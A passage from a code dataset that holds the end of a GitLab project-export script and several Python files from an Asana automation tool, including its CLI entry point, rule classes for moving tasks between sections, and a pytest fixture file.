# projects = glc.projects(gl, groups=groups, statistics=True)
# for project in projects:
# print(dir(project))
# break
# glc.export_project(project)
if not group_instructions and not user_instructions:
sys.exit(1)
if noop:
print('Running with "--noop" nothing to do!')
return
if click.confirm('Do you want to archive (mark as read-only, reversible) all exported projects?'):
print(' >> Archiving (marking as read-only) all exported projects')
for project, _ in group_instructions:
print('Archiving', project.name)
project.archive()
for project in user_instructions:
print('Archiving', project.name)
project.archive()
else:
print('All done!')
``` |
{
"source": "JonathanCasey/asana_extensions",
"score": 2
} |
#### File: asana_extensions/asana_extensions/main.py
```python
import argparse
import logging
import signal
import sys
from asana_extensions import version
from asana_extensions.general import config
from asana_extensions.rules import rules
_NAME_MOD_OVERRIDE = 'asana_extensions.main'
if __name__ == '__main__': # Ignored by CodeCov
# Since no unit testing here, code kept at absolute minimum
logger = logging.getLogger(_NAME_MOD_OVERRIDE)
else:
logger = logging.getLogger(__name__)
def main(force_test_report_only, log_level, modules):
"""
Launches the main app.
Args:
force_test_report_only (bool): True to force test report only mode; False
to allow full execution (pending other settings).
log_level (Level/int/str): The desired log level. This can be specified
as a level constant from the logging module, or it can be an int or str
reprenting the numeric value (possibly as a str) or textual name
(possibly with incorrect case) of the level.
modules ([str]): The list of module names of what to execute. See the
arg parsing code in `_setup_and_call_main()` for details of options.
"""
try:
_config_root_logger(log_level)
except (TypeError, ValueError) as ex:
_config_root_logger(logging.NOTSET)
logger.warning(f'Logger setting failed (Exception: {ex}). Defaulting'
+ ' to not set.')
any_errors = None
if modules and any(x.lower() in ['rules', 'all'] for x in modules):
any_errors = not _main_rules(force_test_report_only) \
or any_errors or False
if any_errors is None:
logger.info('Asana Extensions had no modules to run -- fully skipped.')
elif any_errors:
logger.warning('Asana Extensions run completed, but with errors...')
else:
logger.info('Asana Extensions run completed successfully!')
def _main_rules(force_test_report_only):
"""
The main function for execution the rules modules.
Args:
force_test_report_only (bool): True to force test report only mode; False
to allow full execution (pending other settings).
Return:
(bool): True if fully successful (even in test report only mode); False if
any errors occurred that partially or fully prevented completion.
"""
all_rules = rules.load_all_from_config()
return rules.execute_rules(all_rules, force_test_report_only)
def _config_root_logger(log_level):
"""
Configure the root logger.
Specifically, this sets the log level for the root logger so it will apply
to all loggers in this app.
Args:
log_level (Level/int/str): The desired log level. This can be specified
as a level constant from the logging module, or it can be an int or str
reprenting the numeric value (possibly as a str) or textual name
(possibly with incorrect case) of the level.
Raises:
(TypeError): Invalid type provided for `log_level`.
(ValueError): Correct type provided for `log_level`, but is not a valid
supported value.
"""
root_logger = logging.getLogger() # Root logger will config app-wide
handler_stdout = logging.StreamHandler(sys.stdout)
handler_stdout.setLevel(logging.NOTSET)
handler_stdout.addFilter(config.LevelFilter(max_inc_level=logging.INFO))
handler_stderr = logging.StreamHandler()
handler_stderr.setLevel(logging.WARNING)
root_logger.addHandler(handler_stdout)
root_logger.addHandler(handler_stderr)
formatter = logging.Formatter('<%(name)s> %(levelname)s: %(message)s')
handler_stdout.setFormatter(formatter)
handler_stderr.setFormatter(formatter)
str_value_error = None
try:
root_logger.setLevel(log_level.upper())
return
except AttributeError:
# Likely passed in an int, which has no method `upper()` -- retry below
pass
except ValueError as ex:
# ValueError is probably "unknown level" from logger but might be intstr
str_value_error = ex
try:
root_logger.setLevel(int(log_level))
return
except (TypeError, ValueError):
# Probably an invalid type that couldn't be cast -- let fall thru
pass
if str_value_error is not None:
raise str_value_error
raise TypeError('Invalid log level type (somehow). See --help for -l.')
def _setup_and_call_main(_args=None):
"""
Setup any pre-main operations, such as signals and input arg parsing, then
call `main()`. This is basically what would normally be in
`if __name__ == '__main__':` prior to `main()` call, but this allows unit
testing a lot more easily.
Args:
_args ([str] or None): The list of input args to parse. Should only be
used by unit testing. When executing, it is expected this stays as
`None` so it will default to taking args from `sys.argv` (i.e. from
CLI).
"""
_register_shutdown_signals()
parser = argparse.ArgumentParser(description='Process inputs.',
prog='asana_extensions')
parser.add_argument('-e', '--execute',
dest='force_test_report_only',
action='store_const',
const=False,
default=True,
help='Execute the module(s). Without this, it will run in test'
+ ' report only mode.')
parser.add_argument('-l', '--log-level',
default=logging.WARNING,
help='Set the log level through the app. Will only report logged'
+ ' messages that are the specified level or more severe.'
+ ' Defaults to "Warning". Can specify by name or number to'
+ ' match python `logging` module: notset/0, debug/10, info/20,'
+ ' warning/30, error/40, critical/50.')
parser.add_argument('-m', '--modules',
nargs='+',
help='The modules to run in this invocation. Required. Can'
+ ' specify "all" to run all modules. Otherwise, can provide a'
+ ' space-separate list of module names. Supported modules:'
+ ' rules.')
parser.add_argument('--version',
action='version',
version='%(prog)s ' + version.get_full_version_string(),
help='The version of this application/package.')
main(**vars(parser.parse_args(_args)))
def _register_shutdown_signals(signals=None):
"""
Registers the shutdown signals that will be supported, handling any platform
dependent discrepancies gracefully.
Args:
signals ([str] or None): String of names of signals in `signal` module, or
`None` to use defaults.
"""
if signals is None:
signals = ('SIGINT', 'SIGTERM', 'SIGQUIT', 'SIGHUP')
for sig in signals:
try:
signal.signal(getattr(signal, sig), _shutdown)
except AttributeError:
logger.debug(f'Signal "{sig}" not registered for shutdown. Likely'
+ ' not supported by this OS.')
# Likely a platform didn't support one of the options
continue
def _shutdown(signum, _frame):
"""
Perform all necessary operations to cleanly shutdown when required.
This is triggered through signal interrupts as registered when this is
executed as a script.
Args:
signum (int): Number of signal received.
_frame (frame): See signal.signal python docs.
"""
msg = f'Exiting from signal {str(signum)} ...'
logger.warning(msg)
sys.exit(1)
if __name__ == '__main__': # Ignored by CodeCov
# Since no unit testing here, code kept at absolute minimum
_setup_and_call_main()
```
#### File: asana_extensions/rules/move_tasks_rule.py
```python
import logging
import asana
from asana_extensions.asana import client as aclient
from asana_extensions.asana import utils as autils
from asana_extensions.general import config
from asana_extensions.general.exceptions import * # pylint: disable=wildcard-import
from asana_extensions.rules import rule_meta
logger = logging.getLogger(__name__)
class MoveTasksRule(rule_meta.Rule):
"""
Rules to move tasks to the specified destination based on the specified
conditions.
Class Attributes:
N/A
Instance Attributes:
_rules_params ({str:str/int/bool/etc}): The generic dictionary that
defines the parameters for this rule.
[inherited from Rule]:
_rule_id (str): The id used as the section name in the rules conf.
_rule_type (str): The type of rule, such as "move tasks".
_test_report_only (bool): Whether or not this is for reporting for
testing only or whether rule is live.
_is_valid (bool or None): Cached value as to whether the rule is valid.
If not validated yet, will be None.
"""
def __init__(self, rule_params, **kwargs):
"""
Create the Move Tasks Rule.
Args:
rules_params ({str:str/int/bool/etc}): The generic dictionary that
defines the parameters for this rule.
See parent(s) for required kwargs.
Raises:
(AssertionError): Invalid data.
"""
super().__init__(**kwargs)
is_project_given = rule_params['project_name'] is not None \
or rule_params['project_gid'] is not None
assert rule_params['is_my_tasks_list'] is False \
or rule_params['user_task_list_gid'] is None, "Cannot" \
+ " specify 'for my tasks list' and 'user task list gid'" \
+ " together."
is_user_task_list_given = rule_params['is_my_tasks_list'] \
or rule_params['user_task_list_gid'] is not None
assert is_project_given ^ is_user_task_list_given, "Must specify to" \
+ " use a project or user task list, but not both."
assert rule_params['workspace_name'] is not None \
or rule_params['workspace_gid'] is not None, "Must specify" \
+ " workspace."
is_time_given = rule_params['min_time_until_due_str'] is not None \
or rule_params['max_time_until_due_str'] is not None
is_time_parsed = rule_params['min_time_until_due'] is not None \
or rule_params['max_time_until_due'] is not None
assert is_time_given == is_time_parsed, "Failed to parse min/max" \
+ " time until due -- check format."
assert is_time_given ^ rule_params['match_no_due_date'], "Must" \
+ " specify either min/max time until due or match no due" \
+ " date (but not both)."
self._rule_params = rule_params
@classmethod
def load_specific_from_conf(cls, rules_cp, rule_id, rule_params=None,
**kwargs):
"""
Loads the rule-specific config items for this rule from the
configparsers from files provided. Then creates the rule from the data
provided and data loaded.
Args:
rule_cp (configparser): The full configparser from the rules conf.
rule_id (str): The ID name for this rule as it appears as the
section header in the rules_cp.
rule_params ({str: str/int/bool/etc}): The rule parameters loaded from
config. Updated by super classes with their results. Final sub
class expected to be None.
Note: kwargs contains other args to pass thru to constructor.
Returns:
rule (Rule<> or None): The Rule<> object created and loaded from
config, where Rule<> is a subclass of Rule (e.g. MoveTasksRule).
Will return None if failed to load and create due to invalid config.
Abstract parent classes such as Rule will return None.
Raises:
(AssertionError): Invalid data.
"""
assert rule_params is None, "Should not pass anything in for" \
+ " `rule_params`"
try:
rule_params = {}
super_params = {}
super().load_specific_from_conf(rules_cp, rule_id, super_params,
**kwargs)
rule_params['project_name'] = rules_cp.get(rule_id, 'project name',
fallback=None)
rule_params['project_gid'] = rules_cp.getint(rule_id, 'project gid',
fallback=None)
rule_params['is_my_tasks_list'] = rules_cp.getboolean(rule_id,
'for my tasks list', fallback=None)
rule_params['user_task_list_gid'] = rules_cp.getint(rule_id,
'user task list id', fallback=None)
rule_params['workspace_name'] = rules_cp.get(rule_id,
'workspace name', fallback=None)
rule_params['workspace_gid'] = rules_cp.getint(rule_id,
'workspace gid', fallback=None)
rule_params['match_no_due_date'] = rules_cp.getboolean(rule_id,
'no due date', fallback=False)
rule_params['min_time_until_due_str'] = rules_cp.get(rule_id,
'min time until due', fallback=None)
rule_params['min_time_until_due'] = cls.parse_timedelta_arg(
rule_params['min_time_until_due_str'])
rule_params['max_time_until_due_str'] = rules_cp.get(rule_id,
'max time until due', fallback=None)
rule_params['max_time_until_due'] = cls.parse_timedelta_arg(
rule_params['max_time_until_due_str'])
rule_params['min_due_assumed_time_str'] = rules_cp.get(rule_id,
'assumed time for min due', fallback=None)
rule_params['min_due_assumed_time'] = cls.parse_time_arg(
rule_params['min_due_assumed_time_str'], None)
rule_params['max_due_assumed_time_str'] = rules_cp.get(rule_id,
'assumed time for max due', fallback=None)
rule_params['max_due_assumed_time'] = cls.parse_time_arg(
rule_params['max_due_assumed_time_str'], None)
rule_params['src_sections_include_names'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections include names', fallback=None),
config.CastType.STRING, delim=None, delim_newlines=True,
strip_quotes=True)
rule_params['src_sections_include_gids'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections include gids', fallback=None),
config.CastType.INT, delim_newlines=True)
rule_params['src_sections_exclude_names'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections exclude names', fallback=None),
config.CastType.STRING, delim=None, delim_newlines=True,
strip_quotes=True)
rule_params['src_sections_exclude_gids'] = \
config.parse_list_from_conf_string(rules_cp.get(rule_id,
'src sections exclude gids', fallback=None),
config.CastType.INT, delim_newlines=True)
rule_params['dst_section_name'] = rules_cp.get(rule_id,
'dst section name', fallback=None)
rule_params['dst_section_gid'] = rules_cp.getint(rule_id,
'dst section gid', fallback=None)
except config.UnsupportedFormatError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' time args. Exception: {str(ex)}')
return None
except KeyError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' keys. Exception: {str(ex)}')
return None
except TimeframeArgDupeError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' timeframe args. Exception: {str(ex)}')
return None
except ValueError as ex:
logger.error('Failed to parse Move Tasks Rule from config. Check'
+ f' strong typed values. Exception: {str(ex)}')
return None
try:
rule = cls(rule_params, **kwargs, **super_params, rule_id=rule_id)
return rule
except AssertionError as ex:
logger.error(f'Failed to create Move Tasks Rule from config: {ex}')
return None
@classmethod
def get_rule_type_names(cls):
"""
Get the list of names that can be used as the 'rule type' in the rules
conf to identify this rule.
Returns:
([str]): A list of names that are valid to use as the type for this
rule.
"""
# pylint: disable=multi-line-list-first-line-item
# pylint: disable=multi-line-list-eol-close, closing-comma
return ['move tasks', 'auto-promote tasks', 'auto-promote',
'auto promote tasks', 'auto promote', 'promote tasks']
def _sync_and_validate_with_api(self):
"""
Sync configuration data with the API and further validate, storing any
newly prepared configuration info.
Returns:
(bool): True if completed successfully; False if failed for any
reason (this should probably catch nearly all exceptions).
"""
rps = self._rule_params # Shorten name since used so much here
try:
if rps['workspace_name'] is not None:
rps['workspace_gid'] = aclient.get_workspace_gid_from_name(
rps['workspace_name'], rps['workspace_gid'])
if rps['project_name'] is not None:
# For now, hardcoded for non-archived project
# Could use None, but workaround for now is to specify by gid
rps['project_gid'] = aclient.get_project_gid_from_name(
rps['workspace_gid'], rps['project_name'],
rps['project_gid'])
if rps['is_my_tasks_list']:
rps['user_task_list_gid'] = aclient.get_user_task_list_gid(
rps['workspace_gid'], True)
if rps['project_gid'] is not None:
rps['effective_project_gid'] = rps['project_gid']
elif rps['user_task_list_gid'] is not None:
rps['effective_project_gid'] = rps['user_task_list_gid']
# Else, shouldn't be possible based on assertions in __init__()
# Always want to default to include for move task rule
rps['src_net_include_section_gids'] = \
autils.get_net_include_section_gids(
rps['effective_project_gid'],
rps['src_sections_include_names'],
rps['src_sections_include_gids'],
rps['src_sections_exclude_names'],
rps['src_sections_exclude_gids'])
if rps['dst_section_name'] is not None:
rps['dst_section_gid'] = aclient.get_section_gid_from_name(
rps['effective_project_gid'], rps['dst_section_name'],
rps['dst_section_gid'])
except (asana.error.AsanaError, aclient.ClientCreationError,
aclient.DataNotFoundError, aclient.DuplicateNameError,
aclient.MismatchedDataError, autils.DataConflictError,
autils.DataMissingError) as ex:
logger.error(f'Failed to sync and validate rule "{self._rule_id}"'
+ f' with the API. Skipping rule. Exception: {str(ex)}')
return False
return True
def execute(self, force_test_report_only=False):
"""
Execute the rule. This should likely check if it is valid and the
criteria to run the rule has been met (if any). If either the rule is
set to test report only or the caller of this method specified to force
to be test report only, no changes will be made via the API -- only
simulated results will be reported (but still based on data from API).
This should ideally catch all errors except ones so catastrophic that
the operation of the entire app should cease immediately. Callers of
this method are not intended to require try/except handling for things
like mis-configured rules, etc.
Args:
force_test_report_only (bool): If True, will ensure this runs as a
test report only with no changes made via the API; if False, will
defer to the `_test_report_only` setting of the rule.
Returns:
(bool): True if fully completed without any errors; False any errors,
regardless of whether it resulted in partial or full failure.
"""
if not self.is_valid():
logger.error(f'Failed to execute "{self._rule_id}" since invalid.')
return False
if not self.is_criteria_met():
logger.info(f'Skipping execution of "{self._rule_id}" completely'
+ ' since criteria not met.')
return False
any_errors = False
rps = self._rule_params # Shorten name since used so much here
tasks_to_move = []
for src_sect_gid in rps['src_net_include_section_gids']:
# Could lock in a dt_base before loop, but likely not an issue
# For now, hardcoded for incomplete tasks
try:
tasks_to_move.extend(autils.get_filtered_tasks(src_sect_gid,
rps['match_no_due_date'],
rps['min_time_until_due'], rps['max_time_until_due'],
rps['min_due_assumed_time'],
rps['max_due_assumed_time']))
except (asana.error.AsanaError, aclient.ClientCreationError) as ex:
logger.error(f'Failed to filter tasks for "{self._rule_id}"'
+ f' in section [{src_sect_gid}]. Skipping section.'
+ f' Exception: {str(ex)}')
any_errors = True
for task in tasks_to_move[::-1]:
# For now, hardcoded to move to top, maintaining order
if self._test_report_only or force_test_report_only:
msg = '[Test Report Only] For MoveTasksRule'
msg += f' "{self._rule_id}", would have moved task'
msg += f' "{task["name"]}" [{task["gid"]}]'
msg += ' to top of section'
if rps['dst_section_name'] is not None:
msg += f' "{rps["dst_section_name"]}"'
msg += f' [{rps["dst_section_gid"]}].'
logger.info(msg)
else:
try:
aclient.move_task_to_section(task['gid'],
rps['dst_section_gid'])
msg = f'Successfully moved task "{task["name"]}"'
msg += f' [{task["gid"]}] to section'
if rps['dst_section_name'] is not None:
msg += f' "{rps["dst_section_name"]}"'
msg += f' [{rps["dst_section_gid"]}] per "{self._rule_id}".'
logger.info(msg)
except (asana.error.AsanaError,
aclient.ClientCreationError) as ex:
msg = f'Failed to move task "{task["name"]}"'
msg += f' [{task["gid"]}] to section'
if rps['dst_section_name'] is not None:
msg += f' "{rps["dst_section_name"]}"'
msg += f' [{rps["dst_section_gid"]}] for "{self._rule_id}".'
msg += f' Skipping task. Exception: {str(ex)}'
logger.error(msg)
any_errors = True
return not any_errors
```
#### File: asana_extensions/rules/rule_meta.py
```python
from abc import ABC, abstractmethod
import datetime as dt
import logging
import re
import string
from dateutil.relativedelta import relativedelta
from asana_extensions.general import config
from asana_extensions.general.exceptions import * # pylint: disable=wildcard-import
logger = logging.getLogger(__name__)
class Rule(ABC):
"""
The abstract class for all automation rule functionality. Each rule type
will subclass this, but externally will likely only call the generic methods
defined here to unify the interface.
This serves as a base class for other rules, so will consume any final
kwargs.
Class Attributes:
N/A
Instance Attributes:
_rule_id (str): The id used as the section name in the rules conf.
_rule_type (str): The type of rule, such as "move tasks".
_test_report_only (bool): Whether or not this is for reporting for
testing only or whether rule is live.
_is_valid (bool or None): Cached value as to whether the rule is valid.
If not validated yet, will be None.
"""
def __init__(self, rule_id, rule_type, test_report_only, **kwargs):
"""
Creates the rule.
Args:
rule_id (str): The id used as the section name in the rules conf.
rule_type (str): The type of rule, such as "move tasks".
test_report_only (bool): Whether or not this is for reporting for
testing only or whether rule is live.
kwargs ({}): Should be empty since this is the base class. Will log
warning if not empty.
"""
self._rule_id = rule_id
self._rule_type = rule_type
self._test_report_only = test_report_only
if kwargs:
logger.warning('Discarded excess kwargs provided to'
+ f' {self.__class__.__name__}: {", ".join(kwargs.keys())}')
self._is_valid = None
@classmethod
@abstractmethod
def load_specific_from_conf(cls, rules_cp, rule_id, rule_params=None,
**kwargs):
"""
Loads the rule-specific config items for this rule from the
configparsers from files provided. Then creates the rule from the data
provided and data loaded.
Args:
rule_cp (configparser): The full configparser from the rules conf.
rule_id (str): The ID name for this rule as it appears as the
section header in the rules_cp.
rule_params ({str: str/int/bool/etc}): The rule parameters loaded from
config. Updated by super classes with their results. Final sub
class expected to be None.
Note: kwargs contains other args to pass thru to constructor.
Returns:
rule (Rule<> or None): The Rule<> object created and loaded from
config, where Rule<> is a subclass of Rule (e.g. MoveTasksRule).
Will return None if failed to load and create due to invalid config.
Abstract parent classes such as Rule will return None.
Raises:
(AssertionError): Invalid data.
(KeyError): Missing critical config keys.
"""
assert rule_params is not None, "Subclass must provide `rule_params`."
try:
rule_params['rule_type'] = rules_cp[rule_id]['rule type']
rule_params['test_report_only'] = rules_cp.getboolean(rule_id,
'test report only', fallback=None)
except KeyError as ex:
logger.error('Failed to parse Rule from config. Check keys.'
+ f' Exception: {str(ex)}')
raise
except ValueError as ex:
logger.error('Failed to parse Rule from config. Check strong typed'
+ f' values. Exception: {str(ex)}')
raise
def get_rule_id(self):
"""
Get the id/name of this rule.
Returns:
_rule_id (str): The ID or name of this rule.
"""
return self._rule_id
@classmethod
@abstractmethod
def get_rule_type_names(cls):
"""
Get the list of names that can be used as the 'rule type' in the rules
conf to identify this rule.
Returns:
([str]): A list of names that are valid to use as the type for this
rule.
"""
@abstractmethod
def _sync_and_validate_with_api(self):
"""
Sync configuration data with the API and further validate, storing any
newly prepared configuration info. This is largely a contintuation
of __init__() where API-dependent items can be completed in case it is
ideal to decouple the API access from __init__().
Returns:
(bool): True if completed successfully; False if failed for any
reason (this should probably catch nearly all exceptions).
"""
def is_valid(self):
"""
Check whether this rule is valid or not. This ideally utilizes a cached
value so that the check for being valid does not need to be done more
than once since that could involve heavy API access. As a result, it is
likely that this should call `_sync_and_validate_with_api()`. In most
cases, can just rely on the logic in this metaclass.
Returns:
(bool): True if is valid; False if invalid.
"""
if self._is_valid is None:
self._is_valid = self._sync_and_validate_with_api()
return self._is_valid
def is_criteria_met(self): # pylint: disable=no-self-use
"""
Checks whether the criteria to run this rule, if any, has been met. If
any additional processing is required for this, it should be done and
stored as appropriate. In such a case, it may be advisable to cache
the overall result.
Where possible, this should be decoupled from `is_valid()`, but in many
cases it will likely make sense for this to only run if `is_valid()` is
True. Hence, this may get masked by that result in those cases.
Some rules do not have any specific criteria as to whether the rule
should run (e.g. no specific datetime at which it should run if script
expected to be called multiple times), in which case this should just
return True.
If a rule does need to implement a criteria check, this should be
overridden.
Returns:
(bool): True if criteria is met for rule to run or there is no
criteria (i.e. this is not applicable); False if not ready to run.
"""
return True
@abstractmethod
def execute(self, force_test_report_only=False):
"""
Execute the rule. This should likely check if it is valid and the
criteria to run the rule has been met (if any). If either the rule is
set to test report only or the caller of this method specified to force
to be test report only, no changes will be made via the API -- only
simulated results will be reported (but still based on data from API).
This should ideally catch all errors except ones so catastrophic that
the operation of the entire app should cease immediately. Callers of
this method are not intended to require try/except handling for things
like mis-configured rules, etc.
Args:
force_test_report_only (bool): If True, will ensure this runs as a
test report only with no changes made via the API; if False, will
defer to the `_test_report_only` setting of the rule.
Returns:
(bool): True if fully completed without any errors; False any errors,
regardless of whether it resulted in partial or full failure.
"""
@classmethod
def parse_time_arg(cls, t_str, is_tz_required=False):
"""
Parses a simple ISO format time string. This does NOT have exhaustive
ISO 8601 format.
Args:
t_str (str or None): The string to parse a time value. None allowed
for convenience.
is_tz_allowed (bool or None): Whether the time string is required to
have timezone information. True and False mean required and not
required, respectively. If None, it is required that the timezone
is NOT provided at all.
Returns:
time_parsed (time or None): The time object parsed from the time
string provided, with the timezone enforced as specified. If None
or empty string provided, None returned.
Raises:
(config.UnsupportedFormatError): Raised if timezone information is
incompatible between the time string provided and the timezone
requirement specified. Specifically, this is raised if timezone is
required and there is no timezone parsed from the string; or if
timezone is prohibited (None) and there is a timezone parsed from
the string.
(ValueError): Raised if not a valid ISO format time string.
"""
assert is_tz_required is True or is_tz_required is False \
or is_tz_required is None, \
'`is_tz_required` must be bool or None'
if t_str is None or t_str == '':
return None
time_parsed = dt.time.fromisoformat(t_str)
if is_tz_required is True and time_parsed.tzinfo is None:
raise config.UnsupportedFormatError('Timezone required for time'
+ f" string, but none found. String: '{t_str}',"
+ f' parsed: `{time_parsed}`')
if is_tz_required is None and time_parsed.tzinfo is not None:
raise config.UnsupportedFormatError('Timezone prohibited for time'
+ f" string, but one was provided. String: '{t_str}',"
+ f' parsed: `{time_parsed}`')
return time_parsed
@classmethod
def parse_timedelta_arg(cls, arg_str):
"""
Parses a timedelta argument as might be specified in a config file.
Possible timeframes to specify (with case-sensitive abbreviations in
parentheses) are:
(m) minutes
(h) hours
(d) days
(w) weeks
(M) Months
(y) years
Shortnames are case sensitive; full names are not.
Months and years will be converted per dateutils.relativedelta's
handling. If ever changed, the intention will be that months and years
will be converted to days with respect to today. If used in combination
with other items, such as days, those will be added AFTER converting
months/years to days.
Args:
arg_str (str or None): The string to parse. Can be None for caller's
convenience.
Returns:
(relativedelta or None): The relative datetime delta specified by the
string. If None or empty string passed in, None is returned.
Raises:
Will pass thru any exceptions raised from timeframe parser.
"""
if arg_str is None or arg_str == '':
return None
kwargs = {}
kwargs['minutes'] = cls.parse_timeframe(arg_str,
{'minutes?': False, 'm': True})
kwargs['hours'] = cls.parse_timeframe(arg_str,
{'hours?': False, 'h': True})
kwargs['days'] = cls.parse_timeframe(arg_str,
{'days?': False, 'd': True})
kwargs['weeks'] = cls.parse_timeframe(arg_str,
{'weeks?': False, 'w': True})
kwargs['months'] = cls.parse_timeframe(arg_str,
{'months?': False, 'M': True})
kwargs['years'] = cls.parse_timeframe(arg_str,
{'years?': False, 'y': True})
return relativedelta(**kwargs)
@classmethod
def parse_timeframe(cls, tf_str, timeframes):
"""
Parses a specific timeframe indicator from a string. A collection of
possible ways that timeframe can be specified can be given in regex
format (must be string Template compatible). Each can specify whether
case sensitive or not.
Exactly 1 match is expected. If no matches, will return nothing; but
more than 1 is considered an error condition.
Args:
tf_str (str): The string to search for timeframe indicators.
timeframes ({str:bool}): Timeframe indicators to search in string,
where the regex strings to search are the keys and the bool value
is whether or not it is case sensitive (True == case sensitive).
Returns:
(int): The number specified with the timeframe if exactly 1 match
found; 0 if no matches.
Raises:
(TimeframeArgDupeError): More than 1 match found.
"""
# Pattern is generally:
# Start of line; or whitespace, letter, or comma (look behind)
# Possible plus/neg sign and definitely digits
# Possible 1 whitespace
# <letter or word> depending on time keyword, word could have s at end
# Whitespace, neg/plus sign, digit, comma, or end of line
# (without consuming)
# Note double $$ used for end of line since written as Template
ptn_template = string.Template(r'(^|(?<=\s|[a-z]|[A-Z]|,))'
+ r'(?P<num>(\+|-)?\d+)\s?' + '$timeframe'
+ r'(?=\s|-|\d|,|\+|$$)')
ptns = []
for timeframe, case_sensitive in timeframes.items():
regex_str = ptn_template.substitute(timeframe=timeframe)
if case_sensitive:
ptn = re.compile(regex_str, re.MULTILINE)
else:
ptn = re.compile(regex_str, re.MULTILINE | re.IGNORECASE)
ptns.append(ptn)
matches = []
for ptn in ptns:
matches.extend(ptn.finditer(tf_str))
if len(matches) == 0:
return 0
if len(matches) > 1:
'/'.join(timeframes.keys())
raise TimeframeArgDupeError('Could not parse time frame - Found'
+ f' {len(matches)} entries for'
+ f' {"/".join(timeframes.keys())} when only 0-1 allowed.')
return int(matches[0].group('num'))
```
#### File: unit/asana/test_client.py
```python
import logging
import types
import uuid
import warnings
import asana
import pytest
from asana_extensions.asana import client as aclient
from asana_extensions.general import config
from tests.exceptions import * # pylint: disable=wildcard-import
from tests.unit.asana import tester_data
@pytest.fixture(name='raise_asana_error')
def fixture_raise_asana_error(request):
"""
Returns a function that can be used to mock a call, simply forcing it to
raise a marked `AsanaError` sub-error. If no marker, will use a default
exception type.
"""
marker = request.node.get_closest_marker('asana_error_data')
if marker is None:
exception_type = asana.error.InvalidRequestError # Arbitrary
else:
exception_type = marker.args[0]
def mock_raise(*args, **kwargs):
"""
Simply raise the desired error.
"""
raise exception_type
return mock_raise
@pytest.fixture(name='project_test', scope='session')
def fixture_project_test():
"""
Creates a test project and returns the dict of data that should match the
'data' element returned by the API.
Will delete the project once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this project fixture, they can run more optimally
without the need to needlessly create and delete this project. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 3 API calls. **
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
proj_name = tester_data._PROJECT_TEMPLATE.substitute({'pid': uuid.uuid4()})
client = aclient._get_client()
ws_gid = aclient.get_workspace_gid_from_name(tester_data._WORKSPACE)
me_data = aclient._get_me()
params = {
'name': proj_name,
'owner': me_data['gid'],
}
proj_data = client.projects.create_project_for_workspace(str(ws_gid),
params)
yield proj_data
client.projects.delete_project(proj_data['gid'])
@pytest.fixture(name='sections_in_project_test', scope='session')
def fixture_sections_in_project_test(project_test):
"""
Creates some test sections in the test project and returns a list of them,
each of which is the dict of data that should match the `data` element
returned by the API.
Will delete the sections once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this section fixture, they can run more optimally
without the need to needlessly create and delete this section. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 5 API calls. **
(API call count is 2*num_sects + 1)
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
num_sects = 2
client = aclient._get_client()
me_data = aclient._get_me()
sect_data_list = []
for _ in range(num_sects):
sect_name = tester_data._SECTION_TEMPLATE.substitute(
{'sid': uuid.uuid4()})
params = {
'name': sect_name,
'owner': me_data['gid'],
}
sect_data = client.sections.create_section_for_project(
project_test['gid'], params)
sect_data_list.append(sect_data)
yield sect_data_list
for sect_data in sect_data_list:
client.sections.delete_section(sect_data['gid'])
@pytest.fixture(name='tasks_in_project_and_utl_test', scope='session')
def fixture_tasks_in_project_and_utl_test(project_test,
sections_in_project_test, sections_in_utl_test):
"""
Creates some tasks in both the user task list (in the test workspace) and
the test project, and returns a list of them, each of which is the dict of
data that should match the `data` element returned by the API. The tasks
in the user task list and the test project are the same tasks.
This differs from the `fixture_tasks_movable_in_project_and_utl_test()` in
that these are expected to not be altered.
Will delete the tasks once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this section fixture, they can run more optimally
without the need to needlessly create and delete this section. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 7 API calls. **
(API call count is 3*num_sects + 1)
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
num_tasks = 2
client = aclient._get_client()
me_data = aclient._get_me()
task_data_list = []
for _ in range(num_tasks):
task_name = tester_data._TASK_TEMPLATE.substitute({'tid': uuid.uuid4()})
params = {
'assignee': me_data['gid'],
'assignee_section': sections_in_utl_test[0]['gid'],
'name': task_name,
'projects': [
project_test['gid'],
],
}
task_data = client.tasks.create_task(params)
task_data_list.append(task_data)
# No way to add project section at task creation, so need separate call
params = {
'task': task_data['gid'],
}
client.sections.add_task_for_section(sections_in_project_test[0]['gid'],
params)
yield task_data_list
for task_data in task_data_list:
client.tasks.delete_task(task_data['gid'])
@pytest.fixture(name='tasks_movable_in_project_and_utl_test', scope='session')
def fixture_tasks_movable_in_project_and_utl_test(project_test,
sections_in_project_test, sections_in_utl_test):
"""
Creates some tasks in both the user task list (in the test workspace) and
the test project, and returns a list of them, each of which is the dict of
data that should match the `data` element returned by the API. The tasks
in the user task list and the test project are the same tasks.
This differs from the `fixture_tasks_in_project_and_utl_test()` in that
these are expected to be movable. As such, this should only be used by
tests that factor in this moving. If multiple test functions use this
fixture, some sort of ordering of dependency it likely required.
Will delete the tasks once done with all tests.
This is not being used with the autouse keyword so that, if running tests
that do not require this section fixture, they can run more optimally
without the need to needlessly create and delete this section. (Also,
could not figure out how to get rid of all syntax and pylint errors).
** Consumes 7 API calls. **
(API call count is 3*num_sects + 1)
"""
# pylint: disable=no-member # asana.Client dynamically adds attrs
num_tasks = 3
client = aclient._get_client()
me_data = aclient._get_me()
task_data_list = []
for i_task in range(num_tasks):
task_name = tester_data._TASK_TEMPLATE.substitute({'tid': uuid.uuid4()})
i_sect = 0
if i_task >= 2:
i_sect = 1
params = {
'assignee': me_data['gid'],
'assignee_section': sections_in_utl_test[i_sect]['gid'],
'name': task_name,
'projects': [
project_test['gid'],
],
}
task_data = client.tasks.create_task(params)
task_data_list.append(task_data)
# No way to add project section at task creation, so need separate call
params = {
'task': task_data['gid'],
}
client.sections.add_task_for_section(
